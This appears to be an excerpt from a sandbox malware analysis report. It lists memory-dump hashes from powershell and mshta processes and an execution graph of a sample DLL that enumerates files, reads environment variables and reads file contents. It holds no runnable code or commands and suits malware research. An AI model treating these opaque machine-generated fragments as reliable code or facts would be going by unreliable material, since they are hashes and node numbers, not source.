                                                                                                                                                                                • Instruction ID: e154d24a2772fada52aebe8ad7b3965c3bef7cd918a2145e188b4f7dfffbe791
                                                                                                                                                                                • Opcode Fuzzy Hash: 87c8d6cb1827c8dd3dd44969ae51cc6f9c0cfb0487dac7b18db8df0bc9f3eca6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1021C13190CA4C9FDB58DB5CD849BB9BBE0FBA9321F00421ED04AD3661D7706416CB91

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P*\
                                                                                                                                                                                • API String ID: 0-3285566512
                                                                                                                                                                                • Opcode ID: 393d42956e2e59ab422a21999eaf1a792f95ce0602d6287be9bf4f4f06f0b614
                                                                                                                                                                                • Instruction ID: f0cbfe415db7e425cc2c2b4d2d39bc37b480e3d27cb96b3f47ab46ea3c830a5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 393d42956e2e59ab422a21999eaf1a792f95ce0602d6287be9bf4f4f06f0b614
                                                                                                                                                                                • Instruction Fuzzy Hash: 04915A20A0DBC90FE74AE72C58157797FD1EF86654F1801EED08ED71A3DA18AC16C392

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: r6R
                                                                                                                                                                                • API String ID: 0-3430837693
                                                                                                                                                                                • Opcode ID: f4c8ec7059c3b8bb329152888139eade80e4765ecbb636e56f4f66e00488fe9d
                                                                                                                                                                                • Instruction ID: 167890aec91a143c6a286427248b63ce743339c62da1d1c3a26d11d0a0259ad6
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c8ec7059c3b8bb329152888139eade80e4765ecbb636e56f4f66e00488fe9d
                                                                                                                                                                                • Instruction Fuzzy Hash: E8212931F0CA994FEB55A32C64113F9B7D2EB89650F1401F7C15EE32A6DA19BC118390

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: r6R
                                                                                                                                                                                • API String ID: 0-3430837693
                                                                                                                                                                                • Opcode ID: cac50ac4a843fd07dd0fac8b702fe4585f3d2c151b1a1060e116f4b4804476cf
                                                                                                                                                                                • Instruction ID: 72c3204d6141fa0aafc81e27b1be0195d45e2150ba09e4e73d25d5f3091efa84
                                                                                                                                                                                • Opcode Fuzzy Hash: cac50ac4a843fd07dd0fac8b702fe4585f3d2c151b1a1060e116f4b4804476cf
                                                                                                                                                                                • Instruction Fuzzy Hash: C6F0E931E1D9D90EF795A32C24052F47AD1EF4A551F5401F6C59DE3263D9146C144380
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000003.470349869.00000000029A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_3_29a0000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction ID: 33d59082bbd617b1ba2246b47c9e786cd9cfebc9f9b4f63aae67282667174bb2
                                                                                                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:6.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:2.6%
                                                                                                                                                                                Total number of Nodes:1687
                                                                                                                                                                                Total number of Limit Nodes:24
7342->7345 7344 100098f1 7343->7344 7344->7292 7345->7341 7351 10009904 7346->7351 7347 10009a0f 7348 10002ada _ValidateLocalCookies 5 API calls 7347->7348 7350 10009a1e 7348->7350 7349 10009986 WideCharToMultiByte 7352 10009a07 GetLastError 7349->7352 7353 100099bb WriteFile 7349->7353 7350->7292 7351->7347 7351->7349 7351->7353 7352->7347 7353->7351 7353->7352 7358 10009737 7354->7358 7355 100097ea 7357 10002ada _ValidateLocalCookies 5 API calls 7355->7357 7356 100097a9 WriteFile 7356->7358 7359 100097ec GetLastError 7356->7359 7360 10009803 7357->7360 7358->7355 7358->7356 7359->7355 7360->7292 7362 10006355 __dosmaperr 19 API calls 7361->7362 7363 1000633d _free 7362->7363 7364 10006368 _free 19 API calls 7363->7364 7365 10006350 7364->7365 7365->7297 7375 10008d52 7366->7375 7368 10009f9f 7369 10009fa7 7368->7369 7370 10009fb8 SetFilePointerEx 7368->7370 7371 10006368 _free 19 API calls 7369->7371 7372 10009fd0 GetLastError 7370->7372 7373 10009fac 7370->7373 7371->7373 7374 10006332 __dosmaperr 19 API calls 7372->7374 7373->7276 7374->7373 7376 10008d5f 7375->7376 7377 10008d74 7375->7377 7378 10006355 __dosmaperr 19 API calls 7376->7378 7380 10006355 __dosmaperr 19 API calls 7377->7380 7382 10008d99 7377->7382 7379 10008d64 7378->7379 7381 10006368 _free 19 API calls 7379->7381 7383 10008da4 7380->7383 7384 10008d6c 7381->7384 7382->7368 7385 10006368 _free 19 API calls 7383->7385 7384->7368 7386 10008dac 7385->7386 7387 100062ac _abort 25 API calls 7386->7387 7387->7384 7389 10008dc9 7388->7389 7391 10008dd6 7388->7391 7390 10006368 _free 19 API calls 7389->7390 7394 10008dce 7390->7394 7392 10008de2 7391->7392 7393 10006368 _free 19 API calls 7391->7393 7392->7318 7395 10008e03 7393->7395 7394->7318 7396 100062ac _abort 25 API calls 7395->7396 7396->7394 7398 10005af6 _abort 36 API calls 7397->7398 7399 10007c24 7398->7399 7400 10007a00 __fassign 36 API calls 7399->7400 7401 10007c34 7400->7401 7401->7336 7402->7312 7406 1000ad24 7403->7406 7405 1000adca 
7405->7227 7407 1000ad30 ___DestructExceptionObject 7406->7407 7417 10008c7b RtlEnterCriticalSection 7407->7417 7409 1000ad3e 7410 1000ad70 7409->7410 7411 1000ad65 7409->7411 7412 10006368 _free 19 API calls 7410->7412 7418 1000ae4d 7411->7418 7414 1000ad6b 7412->7414 7433 1000ad9a 7414->7433 7416 1000ad8d _abort 7416->7405 7417->7409 7419 10008d52 25 API calls 7418->7419 7422 1000ae5d 7419->7422 7420 1000ae63 7436 10008cc1 7420->7436 7422->7420 7423 1000ae95 7422->7423 7424 10008d52 25 API calls 7422->7424 7423->7420 7425 10008d52 25 API calls 7423->7425 7427 1000ae8c 7424->7427 7428 1000aea1 CloseHandle 7425->7428 7430 10008d52 25 API calls 7427->7430 7428->7420 7431 1000aead GetLastError 7428->7431 7429 1000aedd 7429->7414 7430->7423 7431->7420 7432 10006332 __dosmaperr 19 API calls 7432->7429 7445 10008c9e RtlLeaveCriticalSection 7433->7445 7435 1000ada4 7435->7416 7437 10008cd0 7436->7437 7438 10008d37 7436->7438 7437->7438 7442 10008cfa 7437->7442 7439 10006368 _free 19 API calls 7438->7439 7440 10008d3c 7439->7440 7441 10006355 __dosmaperr 19 API calls 7440->7441 7443 10008d27 7441->7443 7442->7443 7444 10008d21 SetStdHandle 7442->7444 7443->7429 7443->7432 7444->7443 7445->7435 7446->7201 7447->7181 7448 10002049 7449 10002055 ___DestructExceptionObject 7448->7449 7450 100020d3 7449->7450 7451 1000207d 7449->7451 7461 1000205e 7449->7461 7453 10002639 ___scrt_fastfail 4 API calls 7450->7453 7462 1000244c 7451->7462 7455 100020da 7453->7455 7454 10002082 7471 10002308 7454->7471 7457 10002087 __RTC_Initialize 7474 100020c4 7457->7474 7459 1000209f 7477 1000260b 7459->7477 7463 10002451 ___scrt_release_startup_lock 7462->7463 7464 10002455 7463->7464 7466 10002461 7463->7466 7465 1000527a _abort 19 API calls 7464->7465 7467 1000245f 7465->7467 7468 1000246e 7466->7468 7469 1000499b _abort 26 API calls 7466->7469 7467->7454 7468->7454 7470 10004bbd 7469->7470 7470->7454 7483 100034c7 RtlInterlockedFlushSList 7471->7483 7473 10002312 7473->7457 7485 1000246f 
7474->7485 7476 100020c9 ___scrt_release_startup_lock 7476->7459 7478 10002617 7477->7478 7479 1000262d 7478->7479 7493 100053ed 7478->7493 7479->7461 7482 10003529 ___vcrt_uninitialize 7 API calls 7482->7479 7484 100034d7 7483->7484 7484->7473 7490 100053ff 7485->7490 7488 1000391b ___vcrt_uninitialize_ptd 5 API calls 7489 1000354d 7488->7489 7489->7476 7491 10005c2b 10 API calls 7490->7491 7492 10002476 7491->7492 7492->7488 7496 100074da 7493->7496 7499 100074f3 7496->7499 7497 10002ada _ValidateLocalCookies 5 API calls 7498 10002625 7497->7498 7498->7482 7499->7497 7633 10008a89 7636 10006d60 7633->7636 7637 10006d69 7636->7637 7638 10006d72 7636->7638 7639 10006c5f 49 API calls 7637->7639 7639->7638 6808 1000220c 6809 10002215 6808->6809 6810 1000221a dllmain_dispatch 6808->6810 6812 100022b1 6809->6812 6813 100022c7 6812->6813 6815 100022d0 6813->6815 6816 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6813->6816 6815->6810 6816->6815 7500 1000724e GetProcessHeap 7501 1000284f 7502 10002882 std::exception::exception 26 API calls 7501->7502 7503 1000285d 7502->7503 7644 10003c90 RtlUnwind 7742 100036d0 7743 100036e2 7742->7743 7745 100036f0 @_EH4_CallFilterFunc@8 7742->7745 7744 10002ada _ValidateLocalCookies 5 API calls 7743->7744 7744->7745 7504 10005351 7505 10005360 7504->7505 7506 10005374 7504->7506 7505->7506 7508 1000571e _free 19 API calls 7505->7508 7507 1000571e _free 19 API calls 7506->7507 7509 10005386 7507->7509 7508->7506 7510 1000571e _free 19 API calls 7509->7510 7511 10005399 7510->7511 7512 1000571e _free 19 API calls 7511->7512 7513 100053aa 7512->7513 7514 1000571e _free 19 API calls 7513->7514 7515 100053bb 7514->7515 7746 100073d5 7747 100073e1 ___DestructExceptionObject 7746->7747 7758 10005671 RtlEnterCriticalSection 7747->7758 7749 100073e8 7750 10008be3 26 API calls 7749->7750 7751 100073f7 7750->7751 7757 10007406 7751->7757 7759 10007269 GetStartupInfoW 7751->7759 7755 10007417 
_abort 7770 10007422 7757->7770 7758->7749 7760 10007286 7759->7760 7761 10007318 7759->7761 7760->7761 7762 10008be3 26 API calls 7760->7762 7765 1000731f 7761->7765 7763 100072af 7762->7763 7763->7761 7764 100072dd GetFileType 7763->7764 7764->7763 7769 10007326 7765->7769 7766 10007369 GetStdHandle 7766->7769 7767 100073d1 7767->7757 7768 1000737c GetFileType 7768->7769 7769->7766 7769->7767 7769->7768 7773 100056b9 RtlLeaveCriticalSection 7770->7773 7772 10007429 7772->7755 7773->7772 7774 10004ed7 7775 10006d60 49 API calls 7774->7775 7776 10004ee9 7775->7776 7785 10007153 GetEnvironmentStringsW 7776->7785 7780 1000571e _free 19 API calls 7781 10004f29 7780->7781 7782 10004eff 7783 1000571e _free 19 API calls 7782->7783 7784 10004ef4 7783->7784 7784->7780 7786 100071bd 7785->7786 7787 1000716a 7785->7787 7789 100071c6 FreeEnvironmentStringsW 7786->7789 7790 10004eee 7786->7790 7788 10007170 WideCharToMultiByte 7787->7788 7788->7786 7791 1000718c 7788->7791 7789->7790 7790->7784 7797 10004f2f 7790->7797 7792 100056d0 20 API calls 7791->7792 7793 10007192 7792->7793 7794 100071af 7793->7794 7795 10007199 WideCharToMultiByte 7793->7795 7796 1000571e _free 19 API calls 7794->7796 7795->7794 7796->7786 7798 10004f44 7797->7798 7799 1000637b _abort 19 API calls 7798->7799 7809 10004f6b 7799->7809 7800 10004fcf 7801 1000571e _free 19 API calls 7800->7801 7802 10004fe9 7801->7802 7802->7782 7803 1000637b _abort 19 API calls 7803->7809 7804 10004fd1 7805 10005000 19 API calls 7804->7805 7807 10004fd7 7805->7807 7806 1000544d ___std_exception_copy 25 API calls 7806->7809 7808 1000571e _free 19 API calls 7807->7808 7808->7800 7809->7800 7809->7803 7809->7804 7809->7806 7810 10004ff3 7809->7810 7812 1000571e _free 19 API calls 7809->7812 7811 100062bc _abort 11 API calls 7810->7811 7813 10004fff 7811->7813 7812->7809 6984 10002418 6985 10002420 ___scrt_release_startup_lock 6984->6985 6988 100047f5 6985->6988 6987 10002448 6989 10004804 6988->6989 6990 10004808 6988->6990 
6989->6987 6993 10004815 6990->6993 6994 10005b7a __dosmaperr 19 API calls 6993->6994 6997 1000482c 6994->6997 6995 10002ada _ValidateLocalCookies 5 API calls 6996 10004811 6995->6996 6996->6987 6997->6995 7645 10004a9a 7648 10005411 7645->7648 7649 1000541d _abort 7648->7649 7650 10005af6 _abort 36 API calls 7649->7650 7653 10005422 7650->7653 7651 100055a8 _abort 36 API calls 7652 1000544c 7651->7652 7653->7651 6515 10001c5b 6516 10001c6b ___scrt_fastfail 6515->6516 6519 100012ee 6516->6519 6518 10001c87 6520 10001324 ___scrt_fastfail 6519->6520 6521 100013b7 GetEnvironmentVariableW 6520->6521 6545 100010f1 6521->6545 6524 100010f1 51 API calls 6525 10001465 6524->6525 6526 100010f1 51 API calls 6525->6526 6527 10001479 6526->6527 6528 100010f1 51 API calls 6527->6528 6529 1000148d 6528->6529 6530 100010f1 51 API calls 6529->6530 6531 100014a1 6530->6531 6532 100010f1 51 API calls 6531->6532 6533 100014b5 lstrlenW 6532->6533 6534 100014d9 lstrlenW 6533->6534 6544 100014d2 6533->6544 6535 100010f1 51 API calls 6534->6535 6536 10001501 lstrlenW lstrcatW 6535->6536 6537 100010f1 51 API calls 6536->6537 6538 10001539 lstrlenW lstrcatW 6537->6538 6539 100010f1 51 API calls 6538->6539 6540 1000156b lstrlenW lstrcatW 6539->6540 6541 100010f1 51 API calls 6540->6541 6542 1000159d lstrlenW lstrcatW 6541->6542 6543 100010f1 51 API calls 6542->6543 6543->6544 6544->6518 6546 10001118 ___scrt_fastfail 6545->6546 6547 10001129 lstrlenW 6546->6547 6558 10002c40 6547->6558 6549 10001148 lstrcatW lstrlenW 6550 10001177 lstrlenW FindFirstFileW 6549->6550 6551 10001168 lstrlenW 6549->6551 6552 100011a0 6550->6552 6553 100011e1 6550->6553 6551->6550 6554 100011c7 FindNextFileW 6552->6554 6555 100011aa 6552->6555 6553->6524 6554->6552 6557 100011da FindClose 6554->6557 6555->6554 6560 10001000 6555->6560 6557->6553 6559 10002c57 6558->6559 6559->6549 6559->6559 6561 10001022 ___scrt_fastfail 6560->6561 6562 100010af 6561->6562 6563 1000102f lstrcatW lstrlenW 6561->6563 6566 100010b5 
lstrlenW 6562->6566 6576 100010ad 6562->6576 6564 1000105a lstrlenW 6563->6564 6565 1000106b lstrlenW 6563->6565 6564->6565 6577 10001e89 lstrlenW 6565->6577 6591 10001e16 6566->6591 6569 10001088 GetFileAttributesW 6572 1000109c 6569->6572 6569->6576 6570 100010ca 6571 10001e89 5 API calls 6570->6571 6570->6576 6573 100010df 6571->6573 6572->6576 6583 1000173a 6572->6583 6596 100011ea 6573->6596 6576->6555 6578 10002c40 ___scrt_fastfail 6577->6578 6579 10001ea7 lstrcatW lstrlenW 6578->6579 6580 10001ed1 lstrcatW 6579->6580 6581 10001ec2 6579->6581 6580->6569 6581->6580 6582 10001ec7 lstrlenW 6581->6582 6582->6580 6584 10001747 ___scrt_fastfail 6583->6584 6611 10001cca 6584->6611 6588 1000199f 6588->6576 6589 10001824 ___scrt_fastfail _strlen 6589->6588 6629 100015da 6589->6629 6592 10001e29 6591->6592 6595 10001e4c 6591->6595 6593 10001e2d lstrlenW 6592->6593 6592->6595 6594 10001e3f lstrlenW 6593->6594 6593->6595 6594->6595 6595->6570 6597 1000120e ___scrt_fastfail 6596->6597 6598 10001e89 5 API calls 6597->6598 6599 10001220 GetFileAttributesW 6598->6599 6600 10001235 6599->6600 6601 10001246 6599->6601 6600->6601 6603 1000173a 29 API calls 6600->6603 6602 10001e89 5 API calls 6601->6602 6604 10001258 6602->6604 6603->6601 6605 100010f1 50 API calls 6604->6605 6606 1000126d 6605->6606 6607 10001e89 5 API calls 6606->6607 6608 1000127f ___scrt_fastfail 6607->6608 6609 100010f1 50 API calls 6608->6609 6610 100012e6 6609->6610 6610->6576 6612 10001cf1 ___scrt_fastfail 6611->6612 6613 10001d55 GetFileSize 6612->6613 6618 10001808 6612->6618 6614 10001ede 21 API calls 6613->6614 6615 10001d66 ReadFile 6614->6615 6616 10001d94 CloseHandle 6615->6616 6617 10001d7d CloseHandle 6615->6617 6616->6618 6617->6618 6618->6588 6619 10001ede 6618->6619 6621 1000222f 6619->6621 6622 1000224e 6621->6622 6623 1000474f _abort 7 API calls 6621->6623 6624 10002250 6621->6624 6637 100047e5 6621->6637 6622->6589 6623->6621 6628 10002908 6624->6628 6644 100035d2 6624->6644 6625 100035d2 
__CxxThrowException@8 RaiseException 6627 10002925 6625->6627 6627->6589 6628->6625 6630 1000160c _strcat _strlen 6629->6630 6631 1000163c lstrlenW 6630->6631 6647 10001c9d 6631->6647 6633 10001655 lstrcatW lstrlenW 6634 10001678 6633->6634 6635 10001693 ___scrt_fastfail 6634->6635 6636 1000167e lstrcatW 6634->6636 6635->6589 6636->6635 6642 100056d0 _abort 6637->6642 6638 1000570e 6639 10006368 _free 19 API calls 6638->6639 6641 1000570c 6639->6641 6640 100056f9 RtlAllocateHeap 6640->6641 6640->6642 6641->6621 6642->6638 6642->6640 6643 1000474f _abort 7 API calls 6642->6643 6643->6642 6646 100035f2 RaiseException 6644->6646 6646->6628 6648 10001ca6 _strlen 6647->6648 6648->6633 6649 100020db 6650 100020e7 ___DestructExceptionObject 6649->6650 6651 10002110 dllmain_raw 6650->6651 6655 1000210b 6650->6655 6660 100020f6 6650->6660 6652 1000212a 6651->6652 6651->6660 6662 10001eec 6652->6662 6654 10002177 6656 10001eec 29 API calls 6654->6656 6654->6660 6655->6654 6658 10001eec 29 API calls 6655->6658 6655->6660 6657 1000218a 6656->6657 6659 10002193 dllmain_raw 6657->6659 6657->6660 6661 1000216d dllmain_raw 6658->6661 6659->6660 6661->6654 6663 10001ef7 6662->6663 6664 10001f2a dllmain_crt_process_detach 6662->6664 6665 10001f1c dllmain_crt_process_attach 6663->6665 6666 10001efc 6663->6666 6671 10001f06 6664->6671 6665->6671 6667 10001f01 6666->6667 6668 10001f12 6666->6668 6667->6671 6672 1000240b 6667->6672 6677 100023ec 6668->6677 6671->6655 6685 100053e5 6672->6685 6790 10003513 6677->6790 6680 100023f5 6680->6671 6683 10002408 6683->6671 6684 1000351e 6 API calls 6684->6680 6691 10005aca 6685->6691 6688 1000351e 6763 10003820 6688->6763 6690 10002415 6690->6671 6692 10005ad4 6691->6692 6693 10002410 6691->6693 6694 10005e08 _abort 10 API calls 6692->6694 6693->6688 6695 10005adb 6694->6695 6695->6693 6696 10005e5e _abort 10 API calls 6695->6696 6697 10005aee 6696->6697 6699 100059b5 6697->6699 6700 100059c0 6699->6700 6701 100059d0 6699->6701 6705 100059d6 
6700->6705 6701->6693 6704 1000571e _free 19 API calls 6704->6701 6706 100059ef 6705->6706 6707 100059e9 6705->6707 6709 1000571e _free 19 API calls 6706->6709 6708 1000571e _free 19 API calls 6707->6708 6708->6706 6710 100059fb 6709->6710 6711 1000571e _free 19 API calls 6710->6711 6712 10005a06 6711->6712 6713 1000571e _free 19 API calls 6712->6713 6714 10005a11 6713->6714 6715 1000571e _free 19 API calls 6714->6715 6716 10005a1c 6715->6716 6717 1000571e _free 19 API calls 6716->6717 6718 10005a27 6717->6718 6719 1000571e _free 19 API calls 6718->6719 6720 10005a32 6719->6720 6721 1000571e _free 19 API calls 6720->6721 6722 10005a3d 6721->6722 6723 1000571e _free 19 API calls 6722->6723 6724 10005a48 6723->6724 6725 1000571e _free 19 API calls 6724->6725 6726 10005a56 6725->6726 6731 1000589c 6726->6731 6737 100057a8 6731->6737 6733 100058c0 6734 100058ec 6733->6734 6750 10005809 6734->6750 6736 10005910 6736->6704 6738 100057b4 ___DestructExceptionObject 6737->6738 6745 10005671 RtlEnterCriticalSection 6738->6745 6740 100057be 6743 1000571e _free 19 API calls 6740->6743 6744 100057e8 6740->6744 6742 100057f5 _abort 6742->6733 6743->6744 6746 100057fd 6744->6746 6745->6740 6749 100056b9 RtlLeaveCriticalSection 6746->6749 6748 10005807 6748->6742 6749->6748 6751 10005815 ___DestructExceptionObject 6750->6751 6758 10005671 RtlEnterCriticalSection 6751->6758 6753 1000581f 6754 10005a7f _abort 19 API calls 6753->6754 6755 10005832 6754->6755 6759 10005848 6755->6759 6757 10005840 _abort 6757->6736 6758->6753 6762 100056b9 RtlLeaveCriticalSection 6759->6762 6761 10005852 6761->6757 6762->6761 6764 1000382d 6763->6764 6768 1000384b ___vcrt_freefls@4 6763->6768 6765 1000383b 6764->6765 6769 10003b67 6764->6769 6774 10003ba2 6765->6774 6768->6690 6779 10003a82 6769->6779 6771 10003b81 6772 10003b99 TlsGetValue 6771->6772 6773 10003b8d 6771->6773 6772->6773 6773->6765 6775 10003a82 try_get_function 4 API calls 6774->6775 6776 10003bbc 6775->6776 6777 10003bd7 TlsSetValue 
6776->6777 6778 10003bcb 6776->6778 6777->6778 6778->6768 6780 10003aaa 6779->6780 6782 10003aa6 __crt_fast_encode_pointer 6779->6782 6780->6782 6783 100039be 6780->6783 6782->6771 6788 100039cd try_get_first_available_module 6783->6788 6784 10003a77 6784->6782 6785 100039ea LoadLibraryExW 6786 10003a05 GetLastError 6785->6786 6785->6788 6786->6788 6787 10003a60 FreeLibrary 6787->6788 6788->6784 6788->6785 6788->6787 6789 10003a38 LoadLibraryExW 6788->6789 6789->6788 6796 10003856 6790->6796 6792 100023f1 6792->6680 6793 100053da 6792->6793 6794 10005b7a __dosmaperr 19 API calls 6793->6794 6795 100023fd 6794->6795 6795->6683 6795->6684 6797 10003862 GetLastError 6796->6797 6798 1000385f 6796->6798 6799 10003b67 ___vcrt_FlsGetValue 5 API calls 6797->6799 6798->6792 6800 10003877 6799->6800 6801 100038dc SetLastError 6800->6801 6802 10003ba2 ___vcrt_FlsSetValue 5 API calls 6800->6802 6807 10003896 6800->6807 6801->6792 6803 10003890 6802->6803 6804 100038b8 6803->6804 6805 10003ba2 ___vcrt_FlsSetValue 5 API calls 6803->6805 6803->6807 6806 10003ba2 ___vcrt_FlsSetValue 5 API calls 6804->6806 6804->6807 6805->6804 6806->6807 6807->6801 6998 1000281c 7001 10002882 6998->7001 7004 10003550 7001->7004 7003 1000282a 7005 1000355d 7004->7005 7008 1000358a 7004->7008 7006 100047e5 ___std_exception_copy 20 API calls 7005->7006 7005->7008 7007 1000357a 7006->7007 7007->7008 7010 1000544d 7007->7010 7008->7003 7011 1000545a 7010->7011 7012 10005468 7010->7012 7011->7012 7017 1000547f 7011->7017 7013 10006368 _free 19 API calls 7012->7013 7014 10005470 7013->7014 7015 100062ac _abort 25 API calls 7014->7015 7016 1000547a 7015->7016 7016->7008 7017->7016 7018 10006368 _free 19 API calls 7017->7018 7018->7014 7814 10004bdd 7815 10004c08 7814->7815 7816 10004bec 7814->7816 7817 10006d60 49 API calls 7815->7817 7816->7815 7818 10004bf2 7816->7818 7820 10004c0f GetModuleFileNameA 7817->7820 7819 10006368 _free 19 API calls 7818->7819 7821 10004bf7 7819->7821 7822 10004c33 7820->7822 
7823 100062ac _abort 25 API calls 7821->7823 7837 10004d01 7822->7837 7824 10004c01 7823->7824 7829 10004c72 7831 10004d01 36 API calls 7829->7831 7830 10004c66 7832 10006368 _free 19 API calls 7830->7832 7835 10004c88 7831->7835 7833 10004c6b 7832->7833 7834 1000571e _free 19 API calls 7833->7834 7834->7824 7835->7833 7836 1000571e _free 19 API calls 7835->7836 7836->7833 7839 10004d26 7837->7839 7841 10004d86 7839->7841 7849 100070eb 7839->7849 7840 10004c50 7843 10004e76 7840->7843 7841->7840 7842 100070eb 36 API calls 7841->7842 7842->7841 7844 10004e8b 7843->7844 7845 10004c5d 7843->7845 7844->7845 7846 1000637b _abort 19 API calls 7844->7846 7845->7829 7845->7830 7847 10004eb9 7846->7847 7848 1000571e _free 19 API calls 7847->7848 7848->7845 7852 10007092 7849->7852 7853 100054a7 __fassign 36 API calls 7852->7853 7854 100070a6 7853->7854 7854->7839 5846 10006d60 5847 10006d69 5846->5847 5848 10006d72 5846->5848 5850 10006c5f 5847->5850 5870 10005af6 GetLastError 5850->5870 5852 10006c6c 5890 10006d7e 5852->5890 5854 10006c74 5899 100069f3 5854->5899 5857 10006c8b 5857->5848 5860 10006cce 5926 1000571e 5860->5926 5864 10006cc9 5923 10006368 5864->5923 5866 10006d12 5866->5860 5932 100068c9 5866->5932 5867 10006ce6 5867->5866 5868 1000571e _free 19 API calls 5867->5868 5868->5866 5871 10005b12 5870->5871 5872 10005b0c 5870->5872 5876 10005b61 SetLastError 5871->5876 5942 1000637b 5871->5942 5935 10005e08 5872->5935 5876->5852 5879 1000571e _free 19 API calls 5882 10005b32 5879->5882 5880 10005b2c 5880->5879 5881 10005b48 5956 1000593c 5881->5956 5884 10005b6d SetLastError 5882->5884 5961 100055a8 5884->5961 5887 1000571e _free 19 API calls 5889 10005b5a 5887->5889 5889->5876 5889->5884 5891 10006d8a ___DestructExceptionObject 5890->5891 5892 10005af6 _abort 36 API calls 5891->5892 5894 10006d94 5892->5894 5895 10006e18 _abort 5894->5895 5896 100055a8 _abort 36 API calls 5894->5896 5898 1000571e _free 19 API calls 5894->5898 6336 10005671 RtlEnterCriticalSection 
5894->6336 6337 10006e0f 5894->6337 5895->5854 5896->5894 5898->5894 6341 100054a7 5899->6341 5902 10006a14 GetOEMCP 5904 10006a3d 5902->5904 5903 10006a26 5903->5904 5905 10006a2b GetACP 5903->5905 5904->5857 5906 100056d0 5904->5906 5905->5904 5907 1000570e 5906->5907 5911 100056de _abort 5906->5911 5908 10006368 _free 19 API calls 5907->5908 5910 1000570c 5908->5910 5909 100056f9 RtlAllocateHeap 5909->5910 5909->5911 5910->5860 5913 10006e20 5910->5913 5911->5907 5911->5909 5912 1000474f _abort 7 API calls 5911->5912 5912->5911 5914 100069f3 38 API calls 5913->5914 5915 10006e3f 5914->5915 5918 10006e90 IsValidCodePage 5915->5918 5920 10006e46 5915->5920 5922 10006eb5 ___scrt_fastfail 5915->5922 5916 10002ada _ValidateLocalCookies 5 API calls 5917 10006cc1 5916->5917 5917->5864 5917->5867 5919 10006ea2 GetCPInfo 5918->5919 5918->5920 5919->5920 5919->5922 5920->5916 6378 10006acb GetCPInfo 5922->6378 5924 10005b7a __dosmaperr 19 API calls 5923->5924 5925 1000636d 5924->5925 5925->5860 5927 10005752 _free 5926->5927 5928 10005729 HeapFree 5926->5928 5927->5857 5928->5927 5929 1000573e 5928->5929 5930 10006368 _free 17 API calls 5929->5930 5931 10005744 GetLastError 5930->5931 5931->5927 6451 10006886 5932->6451 5934 100068ed 5934->5860 5972 10005c45 5935->5972 5937 10005e2f 5938 10005e47 TlsGetValue 5937->5938 5941 10005e3b 5937->5941 5938->5941 5940 10005e58 5940->5871 5976 10002ada 5941->5976 5947 10006388 _abort 5942->5947 5943 100063c8 5946 10006368 _free 18 API calls 5943->5946 5944 100063b3 RtlAllocateHeap 5945 10005b24 5944->5945 5944->5947 5945->5880 5949 10005e5e 5945->5949 5946->5945 5947->5943 5947->5944 5991 1000474f 5947->5991 5950 10005c45 _abort 4 API calls 5949->5950 5951 10005e85 5950->5951 5952 10005ea0 TlsSetValue 5951->5952 5953 10005e94 5951->5953 5952->5953 5954 10002ada _ValidateLocalCookies 5 API calls 5953->5954 5955 10005b41 5954->5955 5955->5880 5955->5881 6007 10005914 5956->6007 6155 10007613 5961->6155 5964 100055b8 5966 100055c2 
